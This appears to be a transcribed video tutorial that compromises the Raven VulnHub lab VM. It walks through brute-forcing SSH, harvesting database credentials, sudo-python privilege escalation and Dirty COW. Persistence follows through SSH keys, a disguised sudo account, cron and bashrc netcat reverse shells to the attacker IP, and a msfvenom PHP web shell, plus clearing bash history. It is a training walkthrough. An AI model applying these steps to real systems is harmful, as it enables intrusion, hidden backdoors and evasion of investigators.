Welcome. In this video, I will demonstrate red team operations on a Linux virtual machine. So I have my Oracle VirtualBox running. So the virtual machine we'll be using today is called Raven, and you can find Raven on vulnhub.com. So let's me open up my browser and search in vulnhub.com, vulnhub.com, and let's search for the virtual machine Raven. And let me hit enter. So click on the first one, and you can download this using the download mirror link. Just click on the download mirror link and your virtual machine will be downloaded. And go to file, import appliance, and select the virtual machine file. Go to downloads, click on raven.over and open the file. And all the configurations will be set, like the name of the virtual machine and the guest OS type, which is Debian 64-bit, and 1 core CPU and 512 MB RAM, and select NAT network only, and click on finish. So now go to settings, and select network, and select bridge adapter, and allow promiscuous mode, allow all, and click on OK, and start the virtual machine. Let me switch that way, and your virtual machine is booting up. Select Debian or GNU Linux, and let's wait for some time. And log in. So as I remember doing while doing enumeration is the username and password is Michael and Michael. You can enumerate yourself, but in further I'll be demonstrating how to do that enumeration. For now, type in Michael, and let's do an nmap scan. So sudo nmap and nmap, and before that we need to check our etc host file. And we have an entry for raven.local, which is 172.20.10.2. So how to get the IP address is type in IP space A, and you will get your Ethernet IP address on your Ethernet card. You'll have your IP address. So beside inet, you have your IP address, which is 172.20.10.2, and you add it to your etc host file as raven.local. Let me clear the screen, and let's do an nmap scan. So let me type in my Kali password. So essentially what I'm doing is I'm doing a stealth scan or a SYN scan using -SS option and an aggressive mode with all 65,535 ports, and in verbose mode with T4 as the timing template, and save it in nmap format as raven.nmap. So -on is save it in nmap format, output in nmap format, and our target, which is raven.local. So let me type in my password, and it will discover all the open ports on the target machine. And so, and it will scan for the services as well. So let's do cat raven.nmap, and it's overwritten. So we need to run that again. So let this be running. So we discovered port 80. We can go to a browser and check what's on port 80, right? So let's open up our browser, and I think the nmap scan is finished. Let's check once the open ports. So it has 45,537 port. Let's go from the top. We have our port 22 open, which is for SSH, and OpenSSH 6.7 is running. And these are all the CVEs attached to that version of SSH. And port 80 is open, which is for HTTP, and it's an Apache server. So let's go to raven.local and check what is running on the server. Okay, let me open up my browser again. And let me search raven.local. I think we went a further step ahead. That's fine. We'll open raven.local. So it's a static site. And if you click on it, nothing happens. So if you click on some of this, we might get a WordPress site if we are lucky. But if we don't know where this is leading us, we can always do a Go Buster or a Dev Buster to check for the subdirectories of the website. And let me see my nmap scan. So port 111 is open, which is RPC, and port 45,537 is open. So, and you can see all the CVEs. And let's do a Go Buster with their option for brute forcing the directories, and our URL with dash u and word list with dash w. So we're using user share seclist discovery web content big.txt. You can find seclist on GitHub. And this is the repository for seclist. And when you click on that, so you get this and download the code, either clone it or download the zip. So what you could do is you can do git clone and seclist.git, click on enter, and seclist will be downloaded, and uh, basically clone the repository in user share, because all the word lists are easily accessible in user share. And we use big.txt. So we hit enter, and we see all this htaccess, hdpass.id, and we discover the WordPress site. Now, let's go to this WordPress site, and we discovered a blog by the user Michael. Let me zoom in, and here you have Michael, right? So that was the enumeration previously I told you about at the beginning of the video, that Michael was the username and Michael was the password. Let's see how to actually get the username and password. So let's do wp scan dash dash url dash u michael and password. Before that, we enumerate the users and enumerate vulnerable plugins, and we hit on enter. So you need to do a WordPress dash dash update and then run this. So this will find all the plugins that are installed. So 2017 is the vulnerable plugin which is installed, and so I don't think information is displayed here. So let's do another scan, which is for under WP content directory. So we enumerate for users as well as all the plugins, and we get this plugins, vulnerable plugins, as well as users, which is Michael and Steven. So Michael looks promising. So we first do a brute force on Michael for the password, and we use a tool called Hydra. So we use a tool called Hydra, and we give the username as Michael and password with the rocky.txt and word list, and we brute force for SSH, and we get the password as Michael. I mean login as Michael and password as Michael. So now we can SSH into the machine. So this is what I was explaining at the beginning, right? By doing some enumeration, I got the username and password. So let's log in via SSH, and we are logged in. So now what we can do is we can do a lateral movement. So this is our initial access. So we can check our etc pass stability file to see the all the users. So first we do an ID and do a who am I. We get Michael and we do a if config. So IPA, I guess. So this is the proof that we are the user Michael. And now let's do cat etc pass stability to view all the users and the services. And we do a grep sh dollar, whichever ends with sh or whichever has a shell. That means a user. So FTP is a user which I have created previously in my persistence module. But usually these three are the basic users of this machine: root, Michael, and Steven. So we laterally move for Steven. Before that, we need to check our wp-config.php file. So it contains the database username and password. So first we do a netstat dash tunnel p to see all the outgoing connections, and we have a program name. We have a program which has a port 3306 running. So that means MySQL is running on this WordPress site, and we can attack that. So let's do a cat var www html and WordPress. It's a catch directory, sorry, cd, and let's go to the directory and let's do an ls. So these are all the PHP files that exist, and let's do cat wp-config.php to get the database configurations which are set for the WordPress site. So this is a standard configuration file, and we get uh, get the database name as WordPress, database user as root, database password as Raven Security, and localhost. It's hosted on localhost. So we can do MySQL dump on this, or we can log in using this credentials. Uh, we can do, uh, let's check for any other credentials in this file. So let's copy this database password, and let's do mysql-u root and -p for password, and we are logged in as user root, and we do show databases to see all the databases, and use WordPress database and show tables, and WP users look interesting, so we do select all from WP underscore users. Let's copy that, and we get two entries which are Michael and Steven. So Steven had a different password before. I have changed it to password 123, and this is the MD5 hash of that file. So this is the MD. Uh, let's open up our hash.txt. So this was the original hash for Steven user, and we had cracked it using hashcat. So we changed it using update command, right? And we update Steven's password. So we get the MD5 of password 123, and we update WP underscore users and set the user underscore pass as MD5 password 123, where ID is equal to 2. So we update Steven's password, and we do uh, select all from WP users, and the password seems to have changed, but it doesn't seem in this format. So let's do John dash dash show hash.txt, and we get pink84 as the password, but I don't think this format is MD5. So we update it again, and we do review it, and it just changes back to that pink84. Okay, I don't think this is MD5 format. Let's check whatever format is this, right? Let's copy this, and let's go to browser and search for crackstation.net, and we click on this link, paste in the hash, and we try to crack this hash. So I got a captcha, select all the cars, and let's verify it. And let's click on crack the hash, and the format is not known. So how to crack this hash is using John is we copy this hash and we create a .txt file and name it hash1.txt. So we do nano hash1.txt and type in Michael and colon hash and save it. Michael and colon hash and save it. And we do John hash.txt hash1.txt dash dash word list is equal to user share and share word list and rocky.txt. So let's go to this and type in hash1.txt. So that's the hash we're cracking, and this will keep on running until crack the hash. And what we need to do is we need to do the same thing for Steven's hash. We need to save it as Steven colon hash and then crack it, and you'll get it as pink 84. So now we're doing a lateral movement from Michael user to Steven user. And let's exit out of MySQL and let's do switch user to Steven. And let's paste in Steven's password and let's check ID. So we're Steven, and let's get a bash interactive shell using /bin/bash -i, and we get a bash shell from a normal shell, from a born shell to a born again shell, right? And that's clear. And, so now what we can do is we can run linpiece on the system. We can look for possible privilege escalation. So linpiece is an automated way of looking for possible privilege escalation techniques. So let me go to browser and search in linpiece, or we can do linenum as well. So let's go to linpiece GitHub page, and so Linux privilege escalation awesome script, and we search in releases. So if we go to issues, not issues, we need to go to releases, right? We do /releases, or we have a releases on the right side. So we click on that and we download the .sh file, and we already have the linpiece.sh. So we delete this and we copy this and go to home and search in for payloads. Yeah, we got payloads and we paste that. So we might already have it, but we'll delete that and we'll paste it. Now what you could do is you can go to your terminal and start up a HTTP server using Python module and transfer the lint piece and run the lint piece. So let's check for hash. Let's go to new terminal and let's do cd payloads and list all the payloads which we have, and we start our HTTP server on port 80 and serving HTTP on port 80, and let's do duplicate. So we'll cd into temp, and let's do a duplicate. Once our IP, which is 172.20.10.13, and the name of the file, which is linpiece. Okay, let me show how to check our IP, which is if config, and we copy this after the double LAN 0 if you're using a Wi-Fi. If you're using an Ethernet, it will be ETH0, and we'll start our HTTP server. And let's go to this, and let's type in colon 80 slash linpiece dot sh, connecting to that port, connecting to the IPN port. Let's wait for some time. I think my firewall might be running, and that's blocking port 80, right? So let's do sudo ufw disable if you have any firewall enabled that might be interrupting it. So never run this, never disable the firewall on a production server or on your uh, company client machine. But for demonstration, I'll disable this. Let me type in my Kali password. So yeah, and the firewall is stopped and disabled. Let me run my Python server again, and let's do duplicate, and we got the file. So now we set the executable permissions on linpiece.sh. So chmod is for setting the permissions, and we run linpiece.sh. And so we can stop the server now, but yeah, you can see all the gathered information from linpiece.sh, and it's giving the basic version. So I think the hash is not cracked yet. So let's stop this. Let's clear that, and let's stop this as well. And let's enable our firewall back again, and let's see what information we got. Right, we found a lot of kernel exploits for this particular Linux version, and we got the information as well. We got a lot of information. We got system information. We got kernel exploits, and we got all the CVEs of kernel exploits. And let's do nano methodology to txt while that runs. And basically what we did was we did a reconnaissance, right? Information gathering. We did a passive reconnaissance. I don't think it's passive reconnaissance. It is active reconnaissance because we engaged with our target host or target server, and we did an nmap scan and found WordPress site. Actually, we found port 80, and during scanning, so nmap found port 80 during scanning, and using GoBuster, we found WordPress site. So getting into the details of that, right? And we did initial access. In the initial access, so we did port 22, which is Hydra brute force. Using the tool Hydra, we brute forced for port 22 on port 22, and it was successful. So we were successful in gaining a shell using Michael, and Michael as the username and the password. And we did post-exploitation techniques, like we moved lateral and lateral movement. So we did the lateral movement. We discovered credentials of MySQL. I discovered first MySQL running locally, and we found credentials, or we got the credentials or the hash of we got the credentials of MySQL, and we got the hash of another user using that, called Steven, and we cracked the hash using John. And next, what we can do is we can do a privilege escalation technique. So we can use privilege escalation techniques. So the first privilege escalation technique is kernel exploits, and the second one is sudo or SUID permission set. Sudo permissions set, SUID permissions, and sudo privileges. Sudo abuse of sudo privileges is what I meant. And the third one is so exploiting local user accounts, or that's a persistent technique. So we can search that in Google as well. Like if you search Linux privilege escalation techniques, that might pop up. Some of the techniques might pop up. So let's search Linux privilege escalation techniques, right? The TTP's techniques, tactics, techniques, and procedures. So let's search for techniques and get kernel exploit misconfiguration SUID, sudo misconfiguration, weak file permissions, cron jobs, password or credential exploitation or exploration, and I get a list of this. And so weak file permissions is when etc sudoers and etc pass ability we can modify that, right? If we modify that, we can add our own user. So that is one of the misconfiguration. And we check for bash history as well, right? These are the privilege, some of the privilege escalation techniques I'll be going through, and let's check all this. And let's see kernel exploits, SUID permission or sudo abuse of sudo permissions, weak file permissions, and bash history. So let's go to linpiece and check whatever information we got. So it says it's not a container, It lists out the running process, right? All the system level running process, and so process with credentials and memory. So the cron jobs as well. So cron jobs is also a privilege escalation technique, and so Unix socket analysis, and go down, go down, further down. So we get sudo dash L. So this is what we were looking for. So sudo dash L, which is sudo abuse. So it found one of this set, like the, so we can run this user bin python as a sudo without any password. So we can utilize this to gain a shell as a root. So this is what we were looking for. And let's go down, further down, and let's go all the way down. These are the capabilities. And let's clear the screen, and let's do sudo dash L to list the binary which is running as sudo, which can be run as sudo without authentication. So that is how we'll escalate our privileges. So we'll go to GDFO bins, we'll go to google.com and search in GDFO bins. So this is where we can exploit a vulnerability. Let's go to sudo, and let's copy this command, right? Let's do sudo and paste in the command, and let's do bash shell instead of sh, and we hit enter, and we get root. So we have successfully escalated the privileges to root, and do id who am I if config to get all the information of this root shell. And we can do find slash, we can check for SUID permissions. So dash perm for permissions, and 4000 is 4 is for read permission, read SUID permission, and dash f. Dash f is for file, search for any files with SUID permission set, and we output, we redirect standard error to dev null. So nothing has been found, and let's check for 666 or 777, and we don't find any SUID. And let's exit out of the root, and let's copy that command. Let's copy our first command and paste for Steven user. We don't get any SUID binary which has been set. Let's search for SUID binaries, and so I don't think we find any SUID binaries, right? Yeah, we'll clear the screen, and let's go to root again. So first privilege escalation technique we saw was using sudo abusable permission, and let's go to methodology.txt. I don't think we saved it here. We saved it in payloads, right? And let's go to methodology.txt. Let's close this, and so we saw how to escalate privileges using sudo, And now we can do cd. We can go to our home directory and we can list all the files. So switch user or exit out of this. And let's get a bin bash interactive shell. Oh, we get Stephen itself. We exit out of this, we exit out of this again. So we go to Michael, we go to home folder and do ls-ail to list all the long list all the files. So we can see the hidden files as well, and we do cat bash underscore history. So now we're checking the history file for any privilege escalation technique. So we find only own our own commands which we previously tried. But in a real environment, you can see the bash history with a lot of commands, and you can try it out. If the bash history has a clear text password, so we look for passwords using this command. So we search for password using grep, using rnw, and we have doing the recursive search on WordPress directory in var.html, and we exactly match this password with case insensitive search, and we hit on enter, and we find a lot of info. So this is how we look for MySQL password, right? And we can do that for credential harvesting. And now let's do history, and we get a bunch of history, and we can do history dash C to clear all the history, and we do history again. We don't find any history. So if that doesn't work, we do cat slash dev slash null redirected to dot bash history. So what this does is it overrides bash history with dev null. And when you do cat dot bash history, so you won't find anything. And we do history dash c to clear the history, and this is clearing tracks, right? And so essentially we saw how to do bash history, and this we will see weak file permissions. So we do ls-ail and search for /etc/fastwd to see the permissions of fastwd, and we get only read write permissions. We get write permissions, but it's for the user. And we'll see in the further how to actually add, and we see Etsy shadow, and it has a read and write permission, so we can abuse that as well. But I'll be showing you a different method where we will you know be adding the user to Etsy passwd. And let's search Linux exploit suggester, and this is a Linux privilege escalation technique. So let's go to Linux exploit suggester and copy the raw file. Let's minimize this and do nano. Right, let's go to temp first, temp directory, and let's do nano linux hyphen exploit hyphen suggester dot sh, and we paste the exploit, and We save it, Control O, Control X to save it, and we do cat Linux Exploit Suggester.sh, and I think we pasted it twice, maybe twice. I don't know. I think we clear everything out and paste it again, right? And what we do is can we can transfer this file, right? We can go to our browser and transfer this file. So let's go to browser, download this file, and Linux Exploit Suggester.sh is there, and we copy that from downloads and paste it to our payloads directory and start up a HTTP server. So the name is linux-exploit-suggester.sh. Download unverified, and it's downloaded now. And let's copy this from downloads, Linux Exploit Suggester, and we save it as les.sh. And we start up our Python HTTP server, clear the screen. When we do wget 172.20.10.13, my IP, and port 80 and slash les.sh. And let's start our HTTP server. Before that, we need to disable our firewall. Again, I don't suggest disabling firewall, right? So we go to that and hit it. Connection refused, right? So we disable it again, and we do duplicate again, and we successfully downloaded the exploit, and we keep permissions for that, and we run that script, and this will give a lot of CVEs, right? And the first CV is dirty cop. So let's go to Google and search for, let's close all the tabs first, and let's search for dirty cow exploit, and get GitHub page. We have dirty.c file in that GitHub page and a readme file. So let's go to exploit DB. So essentially exploit DB is where all the exploits are saved in the Google hacking database. And we have all this information on how to run this. What this does, this creates a default user called Firefart, and its cpastability file will be modified, and a Firefart user is created. These are the instructions how to run the exploit, how to compile the binary as well as to run the exploit. So using GCC we compile it, and using // or bash we run the script. Let's download this exploit, and we already had downloaded this exploit. So let's delete it, and it was 40839. And let's go to our HTTP server, and let's copy this from downloads to our payload directory. and we copied the dirty.c. We saved it as dirty.c, and let's start our HTTP server, and let's do wget. So wget 172.20.10.13 colon 80, and let's do dirty.c, hit enter, and let's run compile the exploit using exploitdb command, and here it is. Copy this and we paste it, and the compiled file is there. So we do ls and we see we see dirty script, and I mean the name of the file is dirty, and do dot slash, and so we enter the new password, which is password 007. So this is the new line. Firefart user will be created, and we wait for some time. And we go to methodology.txt, and we saw how to do kernel exploits, and we saw how to do SUID or pseudo abuse. Let's see. Okay, it's doing. The script is running, and let's wait for some time. And we do methodology.txt. So we saw all these methods, right? We can say another method is creating a router local user. So actually it's a persistence technique, right? So we can check local accounts, and this exploit is still running. Let's do persistence. So after we gain root shell, what we can do is we can look for persistence methods, like persistence techniques or persistence procedures. So what basically persistence is that whenever you reboot a device, the, the access should be maintained and you should not lose access. And the first persistent technique is SSH keys and creating a local user. And the third persistent technique is by adding a cron job or by creating a cron job. And the fourth, which we'll be seeing, is so let's go to Google and search for persistence techniques, right? Let's open our Chromium browser, and this exploit is almost complete. and you can log in with the user firefart and password 007. Let's search for Linux persistence techniques or methods, and we can go to linode.com and let's click linode.com and let's see what we have. So these are the tactics, techniques, and procedures. And in persistence, we have seen SSH keys and Unix shell configuration modification. So that we need to add, and this is by editing bash rc, and persistence via web shell. So the fourth persistence technique is Unix shell configuration modification. So that is modifying your bash rc file. Whenever the user logs in, you'll get a shell. And the other persistence technique is web shell or creating a backdoor. So web shell because we are creating the web shell here because we have a web server running. And let's see whether this kernel exploit worked. So it seems to be working, like all the script has run, but let's check whether this firefart user has been created. So I don't see any firefart user being created. So the script, so this Debian is not vulnerable to this kind of exploit, and the firefart user is not created. And let's go to methodology.txt, and we have seen all the privilege escalation, and we'll see how to create persistence using SSH keys. So this exploit didn't work for us, but we can look for other exploits, kernel exploits, and try it out. But let's go to the next technique, which is persistence, and let's do SSH keys, and let's do SSH hyphen keygen to generate public as well as private key. Before that, we go to .ssh folder and we remove rm minus recursive folder. We delete all the files, and see, we don't find any file. And we do ssh hyphen keygen to generate the public key as well as the private key, and we name our file as simply as key and overwrite it. Yes, I don't think we should be creating this in the home folder. We'll create it in the .ssh folder, right? So we'll do catch directory.ssh, and we do ssh hyphen keygen, and we name our file as key. We click on empty passphrase, and we click on empty passphrase again, and we see key and key.pub. So now what you do is essentially copy this key.pub to authorized keys of Michael user, right? Or yeah, we copy this key.pub to the user root actually, right? So we create a SSH folder. So First, we uh, switch user to Steven, and we type in his password, which was, I guess, pink84, and it failed. Let's check Steven's password. Let's go to home and let's do John show hash.txt, and it was pink84. Copy this password and we paste the password, and we do sudo dash l, and we have user bin python, and we do bin bash interactive shell, and let's go to GTF for bins. Let's open a browser. So let's open up GTF for bins. And let's go to sudo. Let's copy this command, and let's do sudo and paste that. We need a bash shell, so and we get bash shell. So let's see whether we have a .ssh in root. So we do cd.ssh. If we don't have it, or if I can type ssh. So we have it, and we have the authorized keys as well, and we do nano authorized keys. So we edit the authorized keys and add our own key. Right, previously I had added it, but I'll add it again, and paste the SSH key, and we save it, and now what we can do is we can go to this and we just type in SSH root at raven.local, and you'll be logged in. So it's asking to fingerprint. You can give yes or no based on your priorities, and we log in. We gain access as a root. So we exit. So this is one of the persistence technique, which is by using SSH key. And we can, if we are in another folder, we can use a private key to log in, and SSH root at raven.local by giving a private key, and we are logged in as root. So now what we can do is we can go to our next persistence technique. Let's exit out of this, and let's go to creating a local user. So we can do this by doing user add, and by by the command user add. So first we go to the manual of user add. Here you can see the option -m, creating the home directory while adding the user. So -m creates the home directory, and we go to -s for bin bash shell. So we specify the shell, and we specify we need a home directory. So we do user add -m to create the home directory, and -s, and we name it. We first specify the shell, which is /bin/bash, and hit on enter. Or we need to give a name to this user, right? We can name this user as SSH daemon, and we hit enter, and we can can see if we do cat etc pass stability, we can see that SSH daemon is successfully added, right? So clear the screen and we do user mod dash ag to add to the group of sudo, and we add SSH daemon to the group called sudo. So what this does is sudo, it will add, so there's a group called sudo, there's a group called root. So root is a user and your root has a, is belongs to some group, and we do pass wd ssh daemon to give a password. We can do password 007, retype the new password, and we updated the password as well. So now what we need to do is we just need to do ssh daemon at raven.local. So we do groups and see root. Root belongs to root group, and we do group sudo. We don't find anything. We do cat etc slash sudoers, and we see sudoers, sudo as the group, root as the group, and these are all the sudoers. So we need to add to the sudoers group, pick any of this group and add it, either root or sudo, and so now we can do an SSH. We can directly SSH into SSH daemon, right? So we do SSH and we do SSH daemon at raven.local, and we logged in successfully. So this is the second persistence technique. We typed in the password and we logged in successfully. And we do ID, we do who am I. So this is the second persistent technique. We do if config or we do IPA, and this is the second persistent technique, which is creating a local user. And we covered both these techniques in persistence, under persistence technique. And let's see our next technique, which is creating a cron job. So to list the cron job, we do cron job dash L. So previously I had this cron job running. So let's edit it. Cron tab dash E to edit. So essentially what we are doing is, let's remove this. So we give, first we start with star asterisk sign, and this asterisk sign is 5 times because I'll tell you why. Let's type in 5 asterisks and let's do netcat. Right, it's 5 asterisks because we are doing it for each minute, every hour, every day of the month, every month, and day of the week. So it's written in that. It's written in the comments. You can read it, and we do nc-e bin bash 172.20.10.13, and we give our port. We can give any port. We will give 9001, and we'll save it, and we do contab dash L to list it, and edit it again. So yeah, here you can read it, right? It is just doing for every minute, every hour, and every day of the month. So basically, every minute the box is running, this cron tab is running. So this command gets executed. So you need 1 minute after you make this change to get a shell. So let's start our netcat listener. So we exit out of this and we start the netcat listener at port 9001. And we'll see Unix shell configuration modification. We need 1 minute time for front job to run. So we will see Unix shell till that time we'll see Unix shell configuration modification. So we edit the bash rc file and I've already edited it. So it's the same command. It's netcat command and with bin bash and port is 1234 and we redirect the error to dev null and we create a background process. So in Linux, ampersand is used to create the background process. And so we'll get back to that. Before that, we do netcat listen on port 1234. And what we need to do is we need to exit out of this and we need to SSH. So let's go to another terminal and let's do cd.ssh and let's do ssh root at raven.local. And when we log in, what this does is the bash rc file runs and we get a connection back to our host, to our local host, I mean to our host. And so we do id, we get uid 0, which is root, who am I, root, and you do uname dash a to get its architecture, uname dash r to get the version of the OS, and cat etc slash os hyphen release. So if I can type os hyphen release and we get this information of operating system, and this was the persistence technique using Unix shell configuration modification. Using cron jobs also we were successful. After 1 minute of running this cron job, we get a connection back to our machine and we do id, we do who am I, and yeah. So we did both of these techniques where sub techniques where we created a cron job and modified the configuration of the Unix shell. And now let's see web shell or backdoor. So let's close the extra terminals which you don't need. And let's exit out this. And now we'll see how to create a web shell or a backdoor. So we'll be using Metasploit framework for this. And so we'll use MSF Venom to create our payload. So MSF Venom dash P for payload option, and we use PHP interpreter reverse TCP. So PHP is the, the platform and interpreter is the payload type and reverse TCP is the connection type. And we use lhost lport to specify our local host as well as the local port. And so lhost is 172.20.10.13 and we specify our L port as 4444 and we edit our and we encode our payload using PHP base 64 and file raw. We need a raw file, and we change the name of the file as configuration.php, and the payload will be created. And what we need to do is essentially we need to start up our MSF console and start a reverse TCP handler and deliver this payload to the victim website, and we'll get a shell back, meter session back, and we start the Python HTTP server and we go to var www HTML. So this is the root of the website, and we do wget 172.20.10.13 port 80 slash configuration dot php, and we download this, and we start up our MSF console and clear the screen. We do use exploit slash multi slash handler or just multi slash handler to use this module, and we see the options. So we need to set our payload as so we need to set our payload as PHP meterpreter, and reverse TCP, reverse underscore TCP, and we hit enter, and we set lhost as 172.20.10.13, and we run the reverse TCP handler, and we need to go to raven.local slash configuration.php. So we'll close this Firefox, we'll open up Chromium. I have my script blockers on Firefox. That's why I don't want to use Firefox. And let's open up raven.local slash configuration.php. Let me type it. Yeah, so port 4444. Raven.local slash configuration.php. I did not set the L port because it was already defaulted to 4444. Oh, we did a mistake. Yes, because we needed to add the command to configuration.php. We edit configuration.php. So we add php command, and we close the php command as well. So we save it and we start our Python HTTP server, and we do a wget again, and we refresh this. I think now we will get a meterpreter session. So we need to first save the file as configuration.php, and we rename the file. So because the configuration.php was already there, it renamed as .1. So we need to rename it back and delete the OG file, and let's refresh this, and you will get a connection back, and you'll get a meterpreter session. Let's clear that out, and you can do shell process created, channel 0 created, and We get a shell, I guess. So we should be getting a shell. Let's wait for some time. So we did essentially was we did active reconnaissance, we did nmap scan, we found port 80, and we did a GoBuster to find the WordPress site. On the WordPress site, we got Michael user, and we did a brute force for his password and on the SSH service, and we gained the shell. So we did post-exploitation technique. So we did a post-exploitation technique. Before that, we enumerated the users using WP scan. So we need to mention WP scan. So yeah, we enumerated the user using WP scan. We found Michael as the user, and then we did a Hydra brute force on the Michael user on the service SSH, which runs on port 22, and we did a lateral movement. We discovered MySQL locally running, and we got the hash of another user called Steven, and we cracked the hash using John. So we cracked the hash using John. Then we did privilege escalation technique where we saw sudo or SUID permission set, sudo and SUID permission set. So we did bash history, local accounts, kernel exploits, and we checked for weak file permissions. And we did persistence using SSH keys, creating a local user, a root user actually. And we created a cron job. We edited Unix shell configurations, and we created a backdoor using PHP reverse TCP interpreter shell. And so that is it, I guess. Thank you for watching.